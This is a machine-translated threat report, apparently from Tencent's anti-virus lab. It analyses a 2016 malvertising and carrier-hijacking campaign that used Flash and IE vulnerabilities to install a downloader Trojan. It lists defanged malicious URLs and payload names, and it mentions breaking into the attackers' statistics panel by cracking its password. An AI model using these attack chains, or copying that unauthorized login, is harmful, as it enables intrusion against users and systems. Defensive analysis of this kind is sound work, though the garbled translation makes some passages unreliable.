Tencent Computer Butler · 2016/03/15 20:57

0 x00 origin


Since March 5th, Tencent anti-virus lab has monitored a large number of well-known software clients releasing abnormal data of download virus, indicating that there may be large-scale attacks on well-known software clients by hanging horses. Computer housekeeper emergency analysis of the relevant data investigation, and finally found that this is a comprehensive use of the operator monitoring lack, network advertisers audit lax, client software security vulnerabilities and other multiple factors for a large-scale network attack, its attack on as many as 3 (see below).

0x01 Analysis Process


1. Attack Mode 1 (on a carrier’s client) : Mount a commercial advertisement

We can find clues from the data that one of the biggest promotion channels is the Speedup module of an operator client. The butler engineer got to thinking: is the new 0day bug being exploited? Regional carrier hijacking?

Based on the IP addresses of some users, it is found that all users are of the same carrier, and the users are widely distributed, but not concentrated in local areas.

The butler starts to install the software in a simulated environment, after which the software normally pulls up the Speedup module.

Speedup. exe has embedded IE controls, but does not show the corresponding window, is a hidden advertisement?

Use a tool to force the window to look like a normal game AD.

Further analysis, the server address of the AD link is hard-coded in speedup.exe, and then the AD URL is obtained every few minutes in the built-in browser, and the AD is displayed in memory after pulling the AD. Because the attribute of the AD window is hidden, the user is completely unaware of the existence of the AD.

Following this lead, we continued to capture and analyze packages, and finally found that the AD would visit a suspicious page: HXXP ://www.ip.u****.com.cn/index.html Directly visit this page, which is ostensibly a normal flash AD for the game.

After reviewing the page’s source code, two of these calls caught our attention

(1) HXXP: / / www.ip.u * * * *. Com. Cn/LSQZA SWF

Through decompilation, we found that lSQza.swf has a doSWF shell

Get true malicious SWF files from memory dump

Decomcompiling the code analysis, it was found that the Trojan uses cVE-2015-5122 vulnerability

The main function of the Playload bug that ends up loading is to download silence_eq014.exe and execute it.

CVE – 2015-5122 technical details www.cvedetails.com/cve/2015-51…

(2) HXXP: / / www.ip.u * * * *. Com. Cn/GXRP. HTML

The content of gxrp.html is a transcoding script

After decoding can be found that the script is famous IE God hole CVE-2014-6332 use code.

The Playload function that the bug eventually loads is to download and execute silence_eq014.exe

It is important to note that the cVE-2014-6332 patch issued by Microsoft does not cover XP, so xp users who are attacked by this vulnerability are vulnerable to successful attacks if they are not protected by security software. CVE – 2014-6332 technical details www.cvedetails.com/cve/2014-63…

The AD page simultaneously uses two vulnerabilities to mount horses to improve the success rate of mount horses, the ultimate purpose of the two attacks is the same — trigger download Trojan installer, download address: HXXP ://download.xin*****rj.cn/download/silence_eq014.exe

The link is still valid after “014” is replaced with any string between “001” and “013” in the address. Obviously, silence_eq virus may be spread in other ways besides advertising.

In order to avoid soft interception as much as possible, silence_EQ series virus adopts automatic and high frequency transformation to avoid killing. The update frequency is about 10 seconds. According to the statistics of existing channels, the number of variants in 24 hours can be as high as 120,000.

(3) Silence_eq Trojan horse analysis

This is a common download Trojan, the main purpose is very simple – from the download list to pull the corresponding promotion software installation package to execute.

Analysis to download list: HXXP ://115******30.228:8090/1.txt

Contains a number of software download address

Directly visit HXXP ://115****** 30.28:8090, the page title is “statistics background management” guess is statistics promotion software downloads.

We cracked the password using “technical means” and logged in. At 17:00 on March 12, the number of infections exceeded 2 million. That number is likely to be much lower than it really is, since statistics can be cleared.

2. Attack 2 (a game) : Targeted hijacking of specific content

Find a problem of the game player, on the computer to capture the package and program monitoring, and finally found that the normal access to http://im****he.gtimg.cn/*****_v1/tvp/js/tvp.player_v2_jq.js was hijacked.

The hijacked JS code is as follows. The normal tvp.player_v2_jq.js will be downloaded first. And then finally will pull http://im * * * *. He gtimg. Cn / * * * * * _v1 / TVP/js/TVP. Player_v2_jq. Js

HXXP ://home.b*****dn2.com/06/main.js will download further JS.

Layer by layer to locate the key horse page: HXXP ://www.m****u.cn/1/index001.html

Does the malicious vulnerability file “lsqza.swf” that was eventually triggered look familiar? It has the same name as the malicious SWF file in attack Method 1, and is obviously the same virus gang.

The subsequent method of triggering the vulnerability is slightly different from 1, only using the CVE-2015-5112 Flash vulnerability. Release and pull the download virus named deskhomepage_179_1.exe after a successful attack.

Eventually install a large number of promotion software, trigger AD pop-up harassment users.

Users can use the housekeeper antivirus function to clean up the promotion software.

3. Attack method 3: Access any web page and randomly insert the horse advertising page

The method is basically the same as 2, but the difference is that the attack method is not hijacking specific data, but randomly inserting horse advertising pages in the network request access data. Any web access initiated by any client software can be tainted, especially if the user is using an unpatched system or software with flash vulnerabilities, such as a browser. The final horse page known for this attack mode is the same as attack mode 2.

0x02 Data Monitoring


In the early stage of the attack, targeted hijacking of a certain game data (attack mode 2) is the main mode, affecting a certain carrier user. Since March 9, Guama Group has used “commercial advertising guama” (attack mode 1) to increase the attack on another operator user across the country.

Henan province has been the most affected.

Silence_eq Trojan and Blackmailer Trojan target certain carrier users, and the affected users do not cluster.

0x03 Summary and Suggestions


The scale of the attack, which involved two major operators and several well-known software products, is rarely seen in The history of the Chinese Internet, with users in Henan province most affected. As of March 14, some download sites involved in the attack were still active and updating their data.

Tencent anti-virus lab believes that these three attacks focus on the current security weaknesses of all parties on the Chinese Internet:

(1) When providing Internet data services, operators should first ensure data security. More perfect monitoring should be established on the data provided by its nodes to avoid the problem of large-scale hijacking of network access content in some areas. The housekeeper has contacted the operator and provided more details to help the operator locate the problem and develop follow-up preventive measures.

(2) In addition to ensuring user data security, formal software manufacturers should pay more attention to data communication security between clients and servers. For example, HTTPS is used to replace HTTP protocol which is easy to be tampered with. Update the components that have security risks, especially flash components that are frequently used by attackers. Early attackers tend to attack browsers with flash components that have vulnerabilities. After browser manufacturers pay attention to relevant problems and actively upgrade Flash versions, client software that lags behind in defense will become the focus of current attacks.

(3) Advertising alliance companies should strengthen the security supervision of all kinds of advertising, especially the security of flash advertising, which is easy to be used, to prevent themselves from being used by attackers and become a Trojan horse communication platform.

(4) The majority of users should pay attention to the use of security software to install the latest patches of the system. Windows xp users are advised to upgrade to Windows 7 or 10 as soon as possible because Microsoft no longer supports Windows XP bug fixes.